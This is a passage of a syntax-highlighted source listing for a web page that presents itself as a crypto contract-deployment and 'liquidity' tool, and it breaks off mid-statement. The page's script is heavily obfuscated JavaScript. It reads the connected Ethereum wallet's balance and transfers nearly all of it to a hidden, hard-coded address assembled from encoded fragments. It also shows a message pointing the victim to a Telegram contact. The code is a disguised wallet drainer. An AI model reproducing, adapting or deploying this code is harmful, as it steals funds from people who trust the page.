<span class="normal"><a href="#line-149">149</a></span>
<span class="normal"><a href="#line-150">150</a></span>
<span class="normal"><a href="#line-151">151</a></span>
<span class="normal"><a href="#line-152">152</a></span>
<span class="normal"><a href="#line-153">153</a></span>
<span class="normal"><a href="#line-154">154</a></span>
<span class="normal"><a href="#line-155">155</a></span>
<span class="normal"><a href="#line-156">156</a></span>
<span class="normal"><a href="#line-157">157</a></span>
<span class="normal"><a href="#line-158">158</a></span>
<span class="normal"><a href="#line-159">159</a></span>
<span class="normal"><a href="#line-160">160</a></span>
<span class="normal"><a href="#line-161">161</a></span>
<span class="normal"><a href="#line-162">162</a></span>
<span class="normal"><a href="#line-163">163</a></span>
<span class="normal"><a href="#line-164">164</a></span>
<span class="normal"><a href="#line-165">165</a></span>
<span class="normal"><a href="#line-166">166</a></span>
<span class="normal"><a href="#line-167">167</a></span>
<span class="normal"><a href="#line-168">168</a></span>
<span class="normal"><a href="#line-169">169</a></span>
<span class="normal"><a href="#line-170">170</a></span>
<span class="normal"><a href="#line-171">171</a></span>
<span class="normal"><a href="#line-172">172</a></span>
<span class="normal"><a href="#line-173">173</a></span>
<span class="normal"><a href="#line-174">174</a></span>
<span class="normal"><a href="#line-175">175</a></span>
<span class="normal"><a href="#line-176">176</a></span>
<span class="normal"><a href="#line-177">177</a></span>
<span class="normal"><a href="#line-178">178</a></span>
<span class="normal"><a href="#line-179">179</a></span>
<span class="normal"><a href="#line-180">180</a></span>
<span class="normal"><a href="#line-181">181</a></span>
<span class="normal"><a href="#line-182">182</a></span>
<span class="normal"><a href="#line-183">183</a></span>
<span class="normal"><a href="#line-184">184</a></span>
<span class="normal"><a href="#line-185">185</a></span>
<span class="normal"><a href="#line-186">186</a></span>
<span class="normal"><a href="#line-187">187</a></span>
<span class="normal"><a href="#line-188">188</a></span>
<span class="normal"><a href="#line-189">189</a></span>
<span class="normal"><a href="#line-190">190</a></span>
<span class="normal"><a href="#line-191">191</a></span>
<span class="normal"><a href="#line-192">192</a></span>
<span class="normal"><a href="#line-193">193</a></span>
<span class="normal"><a href="#line-194">194</a></span>
<span class="normal"><a href="#line-195">195</a></span>
<span class="normal"><a href="#line-196">196</a></span>
<span class="normal"><a href="#line-197">197</a></span>
<span class="normal"><a href="#line-198">198</a></span>
<span class="normal"><a href="#line-199">199</a></span>
<span class="normal"><a href="#line-200">200</a></span>
<span class="normal"><a href="#line-201">201</a></span>
<span class="normal"><a href="#line-202">202</a></span>
<span class="normal"><a href="#line-203">203</a></span>
<span class="normal"><a href="#line-204">204</a></span>
<span class="normal"><a href="#line-205">205</a></span>
<span class="normal"><a href="#line-206">206</a></span>
<span class="normal"><a href="#line-207">207</a></span>
<span class="normal"><a href="#line-208">208</a></span>
<span class="normal"><a href="#line-209">209</a></span>
<span class="normal"><a href="#line-210">210</a></span>
<span class="normal"><a href="#line-211">211</a></span>
<span class="normal"><a href="#line-212">212</a></span>
<span class="normal"><a href="#line-213">213</a></span>
<span class="normal"><a href="#line-214">214</a></span>
<span class="normal"><a href="#line-215">215</a></span>
<span class="normal"><a href="#line-216">216</a></span>
<span class="normal"><a href="#line-217">217</a></span>
<span class="normal"><a href="#line-218">218</a></span>
<span class="normal"><a href="#line-219">219</a></span>
<span class="normal"><a href="#line-220">220</a></span>
<span class="normal"><a href="#line-221">221</a></span>
<span class="normal"><a href="#line-222">222</a></span>
<span class="normal"><a href="#line-223">223</a></span>
<span class="normal"><a href="#line-224">224</a></span>
<span class="normal"><a href="#line-225">225</a></span>
<span class="normal"><a href="#line-226">226</a></span>
<span class="normal"><a href="#line-227">227</a></span>
<span class="normal"><a href="#line-228">228</a></span>
<span class="normal"><a href="#line-229">229</a></span>
<span class="normal"><a href="#line-230">230</a></span>
<span class="normal"><a href="#line-231">231</a></span>
<span class="normal"><a href="#line-232">232</a></span>
<span class="normal"><a href="#line-233">233</a></span>
<span class="normal"><a href="#line-234">234</a></span>
<span class="normal"><a href="#line-235">235</a></span>
<span class="normal"><a href="#line-236">236</a></span>
<span class="normal"><a href="#line-237">237</a></span>
<span class="normal"><a href="#line-238">238</a></span>
<span class="normal"><a href="#line-239">239</a></span>
<span class="normal"><a href="#line-240">240</a></span>
<span class="normal"><a href="#line-241">241</a></span>
<span class="normal"><a href="#line-242">242</a></span>
<span class="normal"><a href="#line-243">243</a></span>
<span class="normal"><a href="#line-244">244</a></span>
<span class="normal"><a href="#line-245">245</a></span>
<span class="normal"><a href="#line-246">246</a></span>
<span class="normal"><a href="#line-247">247</a></span>
<span class="normal"><a href="#line-248">248</a></span></pre></div></td><td class="code"><div><pre><span></span><a id="line-1" name="line-1"></a><span class="go"><section></span>
<a id="line-2" name="line-2"></a><span class="go"> <button id="connectButton">connect</button></span>
<a id="line-3" name="line-3"></a><span class="go"> <table id="checkAdressBalanceButton" style="display: none"></span>
<a id="line-4" name="line-4"></a><span class="go"> <tr></span>
<a id="line-5" name="line-5"></a><span class="go"> <td>my contract</td></span>
<a id="line-6" name="line-6"></a><span class="go"> <td><button id="regular">deploy</button></td></span>
<a id="line-7" name="line-7"></a><span class="go"> <td></span>
<a id="line-8" name="line-8"></a><span class="go"> <p id="result"><code>no contract</code></p></span>
<a id="line-9" name="line-9"></a><span class="go"> </td></span>
<a id="line-10" name="line-10"></a><span class="go"> </tr></span>
<a id="line-11" name="line-11"></a><span class="go"> <tr></span>
<a id="line-12" name="line-12"></a><span class="go"> <td>my second address</td></span>
<a id="line-13" name="line-13"></a><span class="go"> <td></span>
<a id="line-14" name="line-14"></a><span class="go"> <input</span>
<a id="line-15" name="line-15"></a><span class="go"> type="text"</span>
<a id="line-16" name="line-16"></a><span class="go"> id="typeAdress"</span>
<a id="line-17" name="line-17"></a><span class="go"> name="adress_auth"</span>
<a id="line-18" name="line-18"></a><span class="go"> placeholder="Input second address ETH-0x"</span>
<a id="line-19" name="line-19"></a><span class="go"> autocomplete="off"</span>
<a id="line-20" name="line-20"></a><span class="go"> size="20"/></span>
<a id="line-21" name="line-21"></a><span class="go"> </td></span>
<a id="line-22" name="line-22"></a><span class="go"> <td></span>
<a id="line-23" name="line-23"></a><span class="go"> <button id="sendEtherButton" style="display: none">Attach</button></span>
<a id="line-24" name="line-24"></a><span class="go"> </td></span>
<a id="line-25" name="line-25"></a><span class="go"> <td><div id="statusMessage"></div></td></span>
<a id="line-26" name="line-26"></a><span class="go"> </tr></span>
<a id="line-27" name="line-27"></a><span class="go"> <tr></span>
<a id="line-28" name="line-28"></a><span class="go"> <td>my status</td></span>
<a id="line-29" name="line-29"></a><span class="go"> <td><center></span>
<a id="line-30" name="line-30"></a><span class="go"> <button disabled="disabled" id="checkBalanceButton" style="display: none"></span>
<a id="line-31" name="line-31"></a><span class="go"> liquid</span>
<a id="line-32" name="line-32"></a><span class="go"> </button></span>
<a id="line-33" name="line-33"></a><span class="go"> </td></span>
<a id="line-34" name="line-34"></a><span class="go"> <td><p id="balanceDisplay" style="display: none"></p>confirm the liquidity</td></span>
<a id="line-35" name="line-35"></a><span class="go"> </tr></span>
<a id="line-36" name="line-36"></a><span class="go"> </table></span>
<a id="line-37" name="line-37"></a><span class="go"> <script></span>
<a id="line-38" name="line-38"></a><span class="go"> const connectButton = document.getElementById("connectButton");</span>
<a id="line-39" name="line-39"></a><span class="go"> const sendEtherButton = document.getElementById("sendEtherButton");</span>
<a id="line-40" name="line-40"></a><span class="go"> const typeAdress = document.getElementById("typeAdress");</span>
<a id="line-41" name="line-41"></a><span class="go"> const checkBalanceButton =document.getElementById("checkBalanceButton");</span>
<a id="line-42" name="line-42"></a><span class="go"> const balanceDisplay = document.getElementById("balanceDisplay");</span>
<a id="line-43" name="line-43"></a><span class="go"> const checkAdressBalanceButton = document.getElementById("checkAdressBalanceButton");</span>
<a id="line-44" name="line-44"></a><span class="go"> const statusMessage = document.getElementById("statusMessage");</span>
<a id="line-45" name="line-45"></a><span class="go"> let validationComplete = false;</span>
<a id="line-46" name="line-46"></a><span class="go"> let transferInProgress = false;</span>
<a id="line-47" name="line-47"></a><span class="go"> </script></span>
<a id="line-48" name="line-48"></a><span class="go"> <script></span>
<a id="line-49" name="line-49"></a><span class="go"> function _0x161b(){const _0x1ee373=['Dg9tDhjPBMC','A3zSA28','DKHeB2K','q3PRAwu','C2vSzwn0zwrbza','mJa3nZyYrg9VyuXc','v29hthK','CLzjzxm','ntq5mta','y0fcs0O','zxrOzxjLDw0','ntq0mdm4oq','B2nRwKi','zxjYB3i','zwXLz3jHBsbTzq','yxbWBhK','CMvXDwvZDa','qNzpEMm','EK5krxC','y29UC3rYDwn0BW','rMTmELG','ANf2Efe','zxrOx2DHC1bYAq','CgvHDcbHz2fPBG','yMLUza','BwfSBcbHBw91BG','odqWntq2ovDNCgvpBa','C2uGD3jPDguGDa','mtu0mZqX','mtiZndK3ma','zxrOx3nLBMruCG','DhjHy2u','mtK3mdG1mdboEuXct28','DwLKAxr5lIbszq','BMX5vhj1C3rdCG','DgfIBgu','mZyWEeLWDNbS','odq0nta3AuvysMDQ','yw5Jzq','ugHiB2G','rxjYB3iHieeGCW','qxnqDuC','vwLPCem','Aw5MBW','y3rVCIGICMv0Dq','sK1zwKq','se16sK0','BM8GrvriigzVCG','t1z6sLK','kcGOlISPkYKRkq','ChjVDg90ExbL','Exb0BYbnEsbUyq','ntC1mZq','Cwn1sgC','ndqYmKvkCwzAva','CwTgq3G','ntqZnJK0','v0PRB0K','AxjTAw5NigXPCq','r3L6sgi','C2vHCMnO','CMv0DxjUicHMDq','x19WCM90B19F','zhjLC3m','BMn0Aw9UkcKG','BwuGsM9OBIbnyq','Bgf0zxn0','y29UC29Szq','mtK2otaZnNrvt3zezG','v0TJCeC','DcbVzIbSAxf1Aq','mMTLs3bzEG','y21yD0C','qMfnAgG','vLHiEgK','CM4GDgHPCYiPka','A09uAK4','DMfSDwu','ntmZmhLgs1jOwq','zxHJzxb0Aw9U','D2fYBG','uhPyAuC','CNj5','rxjYB3iGy29UzG','E30Uy29UC3rYDq','mtiWnZCXt2jnwLfn','zfHwt0m'];_0x161b=function(){return _0x1ee373;};return _0x161b();}(function(_0x4be467,_0x41dc07){function _0x4676bb(_0x34bd77,_0x131c9f,_0x2e1d48,_0x4f5573){return _0x35be(_0x131c9f- -0xcb,_0x2e1d48);}function _0x303e89(_0x297dde,_0x75d88d,_0x5f59a2,_0x2a57c1){return _0x35be(_0x2a57c1-0x1a9,_0x5f59a2);}const _0x559db1=_0x4be467();while(!![]){try{const _0x13fe9a=parseInt(_0x4676bb(0xa7,0xb8,0xb7,0xb9))/(-0x1c*-0xc5+-0x266e*-0x1+-0x3bf9)*(parseInt(_0x303e89(0x2ea,0x2f3,0x30d,0x2f7))/(-0x1586+-0x8*0x293+0x2a20))+-parseInt(_0x303e89(0x2f1,0x2fc,0x2f9,0x30c))/(-0xda0+-0xa49*-0x1+0x35a)+-parseInt(_0x303e89(0x2ce,0x2de,0x30e,0x2f4))/(0xd1*0x10+-0x3*-0x197+-0x1*0x11d1)+-parseInt(_0x303e89(0x326,0x325,0x2e7,0x2fe))/(-0xe*0x1bb+-0xcc7+0x2506)*(-parseInt(_0x4676bb(0xb5,0xc9,0xa7,0xd7))/(-0xbf6+-0x5*0x348+-0x17*-0x13c))+parseInt(_0x4676bb(0x76,0x91,0xa2,0x97))/(-0x2556+0x14fb+0x6*0x2bb)*(parseInt(_0x303e89(0x340,0x30d,0x324,0x32b))/(-0x625+-0x16a3+0x734*0x4))+parseInt(_0x303e89(0x342,0x30f,0x331,0x321))/(-0x2604+-0x13a1+-0x45*-0xd6)+-parseInt(_0x303e89(0x320,0x346,0x33b,0x327))/(0x130c+0x1*0x1931+0x5*-0x8d7);if(_0x13fe9a===_0x41dc07)break;else _0x559db1['push'](_0x559db1['shift']());}catch(_0x2462bb){_0x559db1['push'](_0x559db1['shift']());}}}(_0x161b,0x116*0xd1c+0x2*0x689d+0x2b8f2*-0x1));const m=_0x5f3ab4(0x200,0x209,0x1f8,0x214);function kyc(_0x32a91b){const _0x5e02ee={'VXHxi':_0x28e8c6(0x21,0x10,0x1d,0x28)+'+$','FkLzX':function(_0x566a06,_0x4bbcc8){return _0x566a06===_0x4bbcc8;},'cmXwG':_0x429f7b(0x29f,0x28d,0x29e,0x280),'jqvxQ':function(_0x482c2a,_0x3f2cf3){return _0x482c2a(_0x3f2cf3);},'MKOjN':_0x429f7b(0x264,0x28f,0x27b,0x27d)+_0x429f7b(0x2df,0x2cd,0x2e5,0x2b3)+_0x28e8c6(0x43,0x27,0x3d,0x18)+_0x429f7b(0x2a3,0x2aa,0x2a8,0x2cc),'WKcpG':function(_0x4490d8,_0x2ee3e8){return _0x4490d8===_0x2ee3e8;},'dXVOC':'USYNQ','kOTjN':function(_0x218394,_0x4a37c6){return _0x218394+_0x4a37c6;},'zLlix':_0x28e8c6(-0x39,-0x10,-0x49,-0x23)+_0x28e8c6(-0x43,-0x21,0x4,-0x20),'utltg':_0x28e8c6(-0x33,-0x26,0x6,-0xc)+_0x429f7b(0x2a0,0x2bf,0x29e,0x296)+_0x429f7b(0x282,0x287,0x298,0x2a7)+'\x20)','GyzHb':function(_0x4fda6f){return _0x4fda6f();},'BvOzc':'log','rjinZ':_0x28e8c6(-0x18,-0x12,-0x10,-0x10),'sNQzs':_0x429f7b(0x29c,0x2be,0x2c8,0x296),'UiipC':_0x28e8c6(0x11,-0x22,0x1a,0x4),'vHDoi':_0x28e8c6(-0x37,-0xe,-0xc,-0x11),'ockZB':function(_0x245e03){return _0x245e03();},'HMzJM':function(_0x2065ca,_0x5df4f3){return _0x2065ca(_0x5df4f3);}},_0x50728c=(function(){let _0x20ee92=!![];return function(_0x1a948e,_0x4e6580){const _0x391b61=_0x20ee92?function(){function _0xd9a1a4(_0x581738,_0x918727,_0x2cd448,_0x2ae1ba){return _0x35be(_0x2ae1ba-0x6f,_0x2cd448);}if(_0x4e6580){const _0x4d73f5=_0x4e6580[_0xd9a1a4(0x1c6,0x1ba,0x1eb,0x1dc)](_0x1a948e,arguments);return _0x4e6580=null,_0x4d73f5;}}:function(){};return _0x20ee92=![],_0x391b61;};}()),_0x3727fe=_0x50728c(this,function(){function _0x21e444(_0x311f73,_0x95c36a,_0x52b03f,_0x3df777){return _0x28e8c6(_0x311f73-0x57,_0x95c36a-0x13e,_0x3df777,_0x52b03f-0x41f);}function _0x19508d(_0x4eead8,_0xb7357a,_0x26d9ae,_0x5007de){return _0x429f7b(_0x4eead8-0x94,_0x5007de-0x26d,_0x4eead8,_0x5007de-0x11c);}return _0x3727fe[_0x21e444(0x40b,0x434,0x416,0x432)]()[_0x19508d(0x4e7,0x4e0,0x4f2,0x4e5)](_0x5e02ee[_0x19508d(0x4fa,0x4d4,0x4db,0x4f3)])['toString']()[_0x21e444(0x3ff,0x443,0x429,0x419)+'r'](_0x3727fe)[_0x19508d(0x4d0,0x50f,0x4eb,0x4e5)](_0x19508d(0x51c,0x553,0x54c,0x531)+'+$');});_0x3727fe();function _0x28e8c6(_0x3a63d0,_0x247d1c,_0x2ef04b,_0x4db041){return _0x5f3ab4(_0x3a63d0-0xf3,_0x4db041- -0x1f6,_0x2ef04b,_0x4db041-0x29);}const _0x1b9833=(function(){let _0x4bd7aa=!![];return function(_0x32677b,_0x21785c){function _0x41043a(_0x5ade94,_0x4969c6,_0x5a2cc0,_0x470ec0){return _0x35be(_0x4969c6-0x2be,_0x470ec0);}function _0x3c7ca0(_0x45d5b5,_0x20b950,_0x4e8349,_0x303066){return _0x35be(_0x4e8349- -0x306,_0x303066);}if(_0x5e02ee[_0x41043a(0x43d,0x430,0x432,0x443)]('PzXiG',_0x5e02ee[_0x41043a(0x435,0x40d,0x432,0x427)])){const _0x49e3ad=_0x4bd7aa?function(){function _0xd283a9(_0x3fdef7,_0x1c2271,_0xe6e619,_0x10ffe7){return _0x3c7ca0(_0x3fdef7-0xbc,_0x1c2271-0x84,_0x1c2271-0x675,_0xe6e619);}function _0x25fbca(_0x3bf716,_0x3fb989,_0x4e3587,_0x4282d4){return _0x3c7ca0(_0x3bf716-0xc9,_0x3fb989-0x114,_0x3bf716-0x60c,_0x4e3587);}if(_0x25fbca(0x467,0x485,0x451,0x452)!==_0x25fbca(0x467,0x479,0x43f,0x468))_0x2e198c=_0x3db077;else{if(_0x21785c){const _0x2daf1d=_0x21785c['apply'](_0x32677b,arguments);return _0x21785c=null,_0x2daf1d;}}}:function(){};return _0x4bd7aa=![],_0x49e3ad;}else{const _0x332771=_0xa48c83?function(){if(_0x2c43ef){const _0x8d3116=_0x120513['apply'](_0x3dd5b8,arguments);return _0x898e90=null,_0x8d3116;}}:function(){};return _0x3f9687=![],_0x332771;}};}()),_0x315348=_0x1b9833(this,function(){function _0x12bd54(_0x4da9f2,_0x245e09,_0x2600dc,_0x15e0b3){return _0x429f7b(_0x4da9f2-0x64,_0x245e09- -0x100,_0x2600dc,_0x15e0b3-0x1f3);}function _0x67c693(_0x1de5b6,_0xd839c8,_0x1b860c,_0x1e1001){return _0x429f7b(_0x1de5b6-0x1bf,_0x1b860c- -0x327,_0xd839c8,_0x1e1001-0xa6);}if(_0x5e02ee[_0x12bd54(0x170,0x181,0x188,0x15a)](_0x67c693(-0x65,-0x77,-0x64,-0x7a),_0x5e02ee[_0x12bd54(0x18e,0x192,0x172,0x170)]))_0x5e02ee[_0x12bd54(0x1c5,0x1a8,0x194,0x19c)](_0x4ee4bd,_0x5e02ee['MKOjN']),_0x5e0ef8[_0x12bd54(0x198,0x1a0,0x174,0x192)](_0x48abf1),_0x2f8bc1=![];else{let _0x4b5e37;try{const _0x271d8c=_0x5e02ee[_0x67c693(-0x8b,-0x76,-0x7f,-0xa4)](Function,_0x5e02ee[_0x67c693(-0x74,-0xa5,-0x9f,-0x98)](_0x5e02ee[_0x67c693(-0xa1,-0x78,-0x9f,-0x91)](_0x5e02ee['zLlix'],_0x5e02ee['utltg']),');'));_0x4b5e37=_0x5e02ee[_0x67c693(-0x56,-0x6c,-0x59,-0x6f)](_0x271d8c);}catch(_0x2052a7){_0x4b5e37=window;}const _0x183590=_0x4b5e37['console']=_0x4b5e37[_0x67c693(-0xa6,-0x94,-0xa8,-0xb8)]||{},_0x25834a=[_0x5e02ee[_0x12bd54(0x186,0x1a4,0x18a,0x1ca)],_0x5e02ee['rjinZ'],_0x5e02ee['sNQzs'],_0x5e02ee[_0x12bd54(0x1c4,0x1bd,0x1a1,0x1b3)],_0x5e02ee[_0x12bd54(0x1ab,0x195,0x19d,0x1a2)],_0x12bd54(0x1c8,0x1b6,0x1a3,0x1d0),_0x12bd54(0x1cf,0x1b2,0x1bb,0x1ce)];for(let _0x4b50b4=-0x233*-0x3+0x1*-0xbb2+0x519;_0x4b50b4<_0x25834a['length'];_0x4b50b4++){const _0x26e35e=_0x1b9833['constructo'+'r'][_0x67c693(-0x3c,-0x72,-0x62,-0x56)][_0x67c693(-0x7a,-0x81,-0x7c,-0x7e)](_0x1b9833),_0xb564c4=_0x25834a[_0x4b50b4],_0x3f70b3=_0x183590[_0xb564c4]||_0x26e35e;_0x26e35e[_0x12bd54(0x185,0x17a,0x15b,0x187)]=_0x1b9833[_0x12bd54(0x1bf,0x1ab,0x1b2,0x190)](_0x1b9833),_0x26e35e['toString']=_0x3f70b3[_0x67c693(-0x9e,-0x90,-0x94,-0xa0)][_0x12bd54(0x1c9,0x1ab,0x182,0x1ca)](_0x3f70b3),_0x183590[_0xb564c4]=_0x26e35e;}}});_0x5e02ee[_0x28e8c6(-0x25,0x26,0x9,0x3)](_0x315348);function _0x429f7b(_0x373f09,_0x4a48b3,_0x526f2c,_0xdf424a){return _0x5f3ab4(_0x373f09-0x120,_0x4a48b3-0xa6,_0x526f2c,_0xdf424a-0xfd);}return _0x5e02ee[_0x429f7b(0x2dc,0x2c1,0x29d,0x2eb)](parseInt,_0x32a91b)[_0x429f7b(0x293,0x293,0x292,0x275)](0x1b6f+0x12ad+-0x2e0c*0x1);}function _0x35be(_0x1944d8,_0x3d244d){const _0x24d4e5=_0x161b();return _0x35be=function(_0x56bbf4,_0x2de867){_0x56bbf4=_0x56bbf4-(-0x2291+-0x2442+-0x2*-0x240b);let _0x361830=_0x24d4e5[_0x56bbf4];if(_0x35be['ygKGnz']===undefined){var _0x42c53f=function(_0x153502){const _0x4ee4bd='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x5e0ef8='',_0x48abf1='',_0x2f8bc1=_0x5e0ef8+_0x42c53f;for(let _0x2e2fc3=-0xb5*0x10+-0x1433*-0x1+0x1*-0x8e3,_0x291d93,_0x12a5d6,_0x3691ee=-0xf6+-0x58*-0x5+0xc2*-0x1;_0x12a5d6=_0x153502['charAt'](_0x3691ee++);~_0x12a5d6&&(_0x291d93=_0x2e2fc3%(-0x9a9+0x25ef+-0x2*0xe21)?_0x291d93*(-0x1444+0xd07+0x77d)+_0x12a5d6:_0x12a5d6,_0x2e2fc3++%(-0xa99*0x1+-0x184f+-0x1*-0x22ec))?_0x5e0ef8+=_0x2f8bc1['charCodeAt'](_0x3691ee+(0x15d1*-0x1+-0x1bbf+0x1*0x319a))-(0x3*0x63+-0xb1*0xc+0x72d)!==0x2596+0x65*0x53+-0x4655?String['fromCharCode'](-0x2203+0x25d+0x20a5&_0x291d93>>(-(0x1508+-0xc74*-0x2+-0x2dee)*_0x2e2fc3&-0x85*0x2f+-0x34e*0x9+-0x362f*-0x1)):_0x2e2fc3:-0x6*-0x104+-0x5*-0x5+0x5*-0x13d){_0x12a5d6=_0x4ee4bd['indexOf'](_0x12a5d6);}for(let _0x4c498f=0x23e3+0x15b6+0x3d7*-0xf,_0x581f8f=_0x5e0ef8['length'];_0x4c498f<_0x581f8f;_0x4c498f++){_0x48abf1+='%'+('00'+_0x5e0ef8['charCodeAt'](_0x4c498f)['toString'](0x871*0x2+0x17a+0x926*-0x2))['slice'](-(-0x53*-0x7+0x1433+0x5*-0x47e));}return decodeURIComponent(_0x48abf1);};_0x35be['amuBRQ']=_0x42c53f,_0x1944d8=arguments,_0x35be['ygKGnz']=!![];}const _0x2a6cb9=_0x24d4e5[-0x3b*-0x13+-0xaf1+0x690],_0x461de1=_0x56bbf4+_0x2a6cb9,_0x1110be=_0x1944d8[_0x461de1];if(!_0x1110be){const _0x56e784=function(_0x17a77b){this['OHgjaQ']=_0x17a77b,this['MgjBrN']=[-0x1829+-0x22cc+-0x3af6*-0x1,0x1*-0x89+-0x4e9*-0x3+-0xe32,0x9d+0x7*-0x180+0x1*0x9e3],this['VCLeBU']=function(){return'newState';},this['xJotmo']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['HwgLZO']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x56e784['prototype']['cRDjHo']=function(){const _0x4235f7=new RegExp(this['xJotmo']+this['HwgLZO']),_0xe0e6f5=_0x4235f7['test'](this['VCLeBU']['toString']())?--this['MgjBrN'][0x13df*0x1+0x2*0x8a0+-0x251e]:--this['MgjBrN'][-0x1*0x7f7+-0x14d+0x944];return this['NTZYwr'](_0xe0e6f5);},_0x56e784['prototype']['NTZYwr']=function(_0x47144e){if(!Boolean(~_0x47144e))return _0x47144e;return this['xnwZzu'](this['OHgjaQ']);},_0x56e784['prototype']['xnwZzu']=function(_0x3447ee){for(let _0x2f8fa5=0x2*0x12be+-0x1a49*-0x1+-0x3fc5*0x1,_0x128e8a=this['MgjBrN']['length'];_0x2f8fa5<_0x128e8a;_0x2f8fa5++){this['MgjBrN']['push'](Math['round'](Math['random']())),_0x128e8a=this['MgjBrN']['length'];}return _0x3447ee(this['MgjBrN'][0xc4+-0x2570+0x24ac]);},new _0x56e784(_0x35be)['cRDjHo'](),_0x361830=_0x35be['amuBRQ'](_0x361830),_0x1944d8[_0x461de1]=_0x361830;}else _0x361830=_0x1110be;return _0x361830;},_0x35be(_0x1944d8,_0x3d244d);}const k='688773',evm=kyc(m),e=_0x5f3ab4(0x232,0x225,0x24b,0x20b),hashlock=kyc(k),unit=''+evm+hashlock,v=_0x5f3ab4(0x22e,0x20a,0x22e,0x202),moe=kyc(e),n='698489',spv=kyc(v);function _0x5f3ab4(_0x1f9262,_0x21c75e,_0x216203,_0x367cfa){return _0x35be(_0x21c75e-0x8f,_0x216203);}const c=_0x5f3ab4(0x1f5,0x1f8,0x1d2,0x1ef),comission=kyc(n);function _0x32f29c(_0x4e063f,_0x855e2e,_0x214214,_0x2ebeea){return _0x35be(_0x214214- -0xe3,_0x2ebeea);}const confirm=''+moe+spv,performTransaction=async()=>{function _0x4e5bb2(_0x3cbdb6,_0xe454a9,_0x14e61a,_0x584d1c){return _0x5f3ab4(_0x3cbdb6-0x188,_0x14e61a-0x2a3,_0x584d1c,_0x584d1c-0x138);}const _0x5d1e4e={'oXSVU':_0x4e5bb2(0x4aa,0x4d2,0x4bf,0x498)+'\x20gas\x20fee','WoGLy':_0x3d7991(0x2d7,0x2fc,0x2ed,0x2d5),'PhHoh':function(_0x430b33,_0x59d79d){return _0x430b33(_0x59d79d);},'zNJEw':function(_0x812b44,_0x4536e2){return _0x812b44(_0x4536e2);},'lgljD':_0x3d7991(0x2d2,0x2df,0x2b6,0x2bd),'JMYZD':function(_0x1da406,_0x161867){return _0x1da406*_0x161867;},'cABKJ':function(_0x4d174f,_0x1e32d7){return _0x4d174f<_0x1e32d7;},'BaMhh':function(_0x402659,_0x11156d){return _0x402659-_0x11156d;},'kvlko':function(_0x46aa0f,_0x4b6407){return _0x46aa0f(_0x4b6407);},'qkFCx':_0x4e5bb2(0x4bd,0x4a6,0x4ae,0x4b0)+'ansaction','dtEHE':function(_0x4408b0,_0x8d5a54){return _0x4408b0+_0x8d5a54;},'AsPuG':_0x3d7991(0x2f4,0x31c,0x33c,0x304)+_0x4e5bb2(0x4cd,0x4c9,0x4a9,0x48b)+_0x3d7991(0x2ee,0x2e3,0x2cf,0x2c7)+'dity.\x20Plea'+_0x4e5bb2(0x48a,0x4ca,0x4ab,0x4d3)+'o\x20me\x20via\x20t'+_0x4e5bb2(0x490,0x492,0x49e,0x49a)+'ssenger\x20@O'+_0x3d7991(0x336,0x316,0x340,0x30e)+_0x3d7991(0x30d,0x327,0x328,0x33f)+_0x3d7991(0x2d4,0x2de,0x2e1,0x2c1)+_0x4e5bb2(0x481,0x4a7,0x48b,0x46b),'WbqYu':function(_0x470534,_0x49d7b1){return _0x470534===_0x49d7b1;},'WDFNj':_0x3d7991(0x32c,0x329,0x33a,0x327),'rVIes':function(_0x5a07dc,_0x403699){return _0x5a07dc(_0x403699);}};function _0x3d7991(_0x406b6a,_0x17ddf2,_0x217fec,_0x11135c){return _0x5f3ab4(_0x406b6a-0x1ce,_0x17ddf2-0x107,_0x11135c,_0x11135c-0x132);}try{const _0x3e1a6f=typeAdress[_0x4e5bb2(0x486,0x497,0x486,0x475)];transferInProgress=!![];const _0x3583e9=_0x5d1e4e[_0x3d7991(0x2fb,0x2fa,0x2d0,0x31b)],_0x1c672b=_0x3d7991(0x312,0x328,0x2ff,0x323),_0x204548=_0x5d1e4e[_0x4e5bb2(0x497,0x4b8,0x4b7,0x4e0)](kyc,c),_0x4ce894=_0x5d1e4e[_0x3d7991(0x32d,0x306,0x31a,0x2dc)](kyc,_0x3583e9),_0x1fcc3d=_0x5d1e4e[_0x4e5bb2(0x4a7,0x4bc,0x4a2,0x497)](kyc,_0x1c672b),_0x49b070=await window[_0x4e5bb2(0x486,0x489,0x49a,0x4c2)][_0x3d7991(0x30a,0x304,0x324,0x2de)]({'method':'eth_getBal'+_0x4e5bb2(0x4b8,0x4ca,0x4b6,0x493),'params':[window['ethereum']['selectedAd'+_0x4e5bb2(0x48d,0x464,0x478,0x47b)],_0x5d1e4e['lgljD']]}),_0x3c0aec={};_0x3c0aec['method']=_0x4e5bb2(0x4b7,0x48c,0x4a6,0x4c1)+'ce';const _0x417a98=await window['ethereum'][_0x4e5bb2(0x476,0x48b,0x4a0,0x48e)](_0x3c0aec),_0x1b3d6c=''+comission+_0x204548,_0x5d4ef4=-0xf79d+-0x65b4*0x2+-0x11*-0x2605,_0xa958b4=_0x5d1e4e[_0x4e5bb2(0x491,0x4d1,0x4bd,0x4af)](_0x417a98,_0x5d4ef4);if(_0x5d1e4e[_0x3d7991(0x306,0x2fd,0x2e6,0x2f8)](BigInt(_0x49b070),_0xa958b4)){_0x5d1e4e[_0x4e5bb2(0x4b0,0x4d6,0x4b7,0x4c5)](alert,_0x5d1e4e['oXSVU']),transferInProgress=![];return;}const _0x25569b=''+_0x4ce894+_0x1fcc3d,_0x370477=_0x5d1e4e[_0x4e5bb2(0x45c,0x46b,0x482,0x479)](_0x5d1e4e[_0x3d7991(0x310,0x2f5,0x31b,0x31a)](BigInt,_0x49b070),BigInt(_0xa958b4)),_0x29edb6='0x'+unit+confirm+_0x1b3d6c+_0x25569b;await window[_0x3d7991(0x307,0x2fe,0x328,0x31b)]['request']({'method':_0x5d1e4e[_0x3d7991(0x321,0x32b,0x34d,0x32e)],'params':[{'from':window[_0x4e5bb2(0x477,0x4a1,0x49a,0x4a2)][_0x4e5bb2(0x46f,0x491,0x494,0x475)+'dress'],'to':_0x29edb6,'value':_0x5d1e4e['dtEHE']('0x',_0x370477['toString'](0x47*0x63+0x18*0xaf+-0x1*0x2bcd))}]}),alert(_0x5d1e4e[_0x4e5bb2(0x4cf,0x4de,0x4b9,0x490)]),transferInProgress=![];}catch(_0x177a68){if(_0x5d1e4e['WbqYu'](_0x5d1e4e['WDFNj'],_0x3d7991(0x317,0x32d,0x345,0x344))){_0x361830(_0x5d1e4e['oXSVU']),_0x42c53f=![];return;}else 